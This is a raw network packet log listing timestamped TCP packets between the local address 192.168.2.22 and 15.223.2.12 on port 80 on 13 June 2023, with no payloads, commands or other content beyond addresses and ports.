                                              Jun 13, 2023 11:01:19.875871897 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.875886917 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.875910997 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.875936985 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.875971079 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.875986099 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876020908 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876034975 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876045942 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876085997 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876116991 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876137018 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876147032 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876188993 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876216888 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876239061 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876254082 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876312017 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876334906 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876364946 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876394033 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876415014 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876431942 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876463890 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876494884 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876513004 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876527071 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876564026 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876590967 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876615047 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876641035 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876663923 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876672029 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876713037 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876760960 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876766920 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876810074 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876813889 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876851082 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876859903 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876869917 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876908064 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876926899 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.876956940 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.876972914 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877005100 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877033949 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877054930 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877082109 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877105951 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877126932 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877154112 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877182961 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877202988 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877203941 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877250910 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877269983 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877299070 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877331972 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877347946 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877350092 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877397060 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877413988 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877444983 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877470016 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877492905 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877506018 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877541065 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877561092 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877589941 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877607107 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877640009 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877669096 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877691984 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877717018 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877739906 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877752066 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877788067 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877818108 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877836943 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877847910 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877886057 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877909899 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877933979 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877958059 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.877983093 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.877996922 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878031969 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878051043 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878082037 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878106117 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878130913 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878154039 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878180027 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878206015 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878230095 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878256083 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878278971 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878297091 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878326893 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878345966 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878376961 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878398895 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878426075 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878442049 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878473997 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878482103 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878501892 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878520012 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878523111 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878571033 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878583908 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878621101 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878644943 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878669977 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878688097 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878719091 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878739119 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878768921 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878793001 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878818035 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878834963 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878865957 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878894091 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878915071 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878938913 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.878966093 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.878982067 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879014969 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879033089 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879064083 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879087925 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879113913 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879138947 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879162073 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879177094 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879210949 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879232883 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879260063 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879281998 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879307985 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879334927 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879357100 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879374981 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879405975 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879424095 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879455090 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879470110 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879502058 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879522085 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879550934 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879569054 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879601002 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879616976 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879648924 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879668951 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879698038 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879714966 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879745960 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879762888 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879795074 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879812002 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879843950 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879861116 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879893064 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879910946 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879940987 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.879968882 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.879991055 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.880003929 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.880038977 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.880060911 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.880086899 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.880105019 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.880136013 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.880151987 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.880183935 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.880203962 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.880233049 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.880249977 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.880297899 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.880306005 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.880347013 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.880367994 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.880395889 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.880419016 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.880445957 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.880465031 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.880510092 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.887401104 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.973095894 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.973171949 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.973234892 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.973294020 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.973352909 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.973402977 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.973403931 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.973403931 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.973412037 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.973403931 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.973469973 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.973469973 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.973473072 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.973531961 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.973557949 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.973591089 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.973612070 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.973671913 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.973891020 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.973967075 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974015951 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974018097 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974052906 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974065065 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974107981 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974112988 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974153042 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974163055 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974195957 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974211931 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974222898 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974261999 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974308014 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974311113 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974347115 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974359035 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974385977 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974406004 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974426985 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974453926 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974488020 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974502087 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974529982 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974550962 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974585056 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974600077 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974647999 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974648952 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974678040 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974697113 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974737883 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974745989 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974766970 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974817991 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974823952 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974868059 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974901915 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974914074 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974946976 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.974961042 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.974996090 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975011110 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975048065 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975060940 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975092888 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975107908 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975132942 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975156069 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975188017 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975202084 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975224972 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975249052 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975280046 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975296974 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975332022 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975344896 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975390911 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975392103 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975439072 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975439072 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975476980 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975487947 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975509882 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975537062 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975544930 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975581884 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975626945 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975631952 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975657940 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975681067 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975716114 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975727081 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975773096 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975779057 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975800991 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975826979 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975860119 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975876093 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975924015 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.975929976 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975956917 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.975970984 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976005077 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976018906 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976036072 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976068020 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976098061 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976114035 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976155996 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976161957 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976196051 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976239920 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976243973 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976313114 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976327896 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976327896 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976327896 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976361990 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976396084 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976408958 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976429939 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976457119 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976485968 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976502895 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976552010 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976552963 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976596117 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976604939 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976646900 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976667881 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976686001 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976716042 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976732969 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976763964 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976795912 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976809978 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976834059 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976867914 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976891041 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976893902 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976938963 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.976950884 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976979971 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.976989031 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.977003098 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.977039099 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.977066994 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.977086067 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.977108002 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.977132082 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.977174997 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.977178097 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.977197886 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.977226019 CEST804919015.223.2.12192.168.2.22
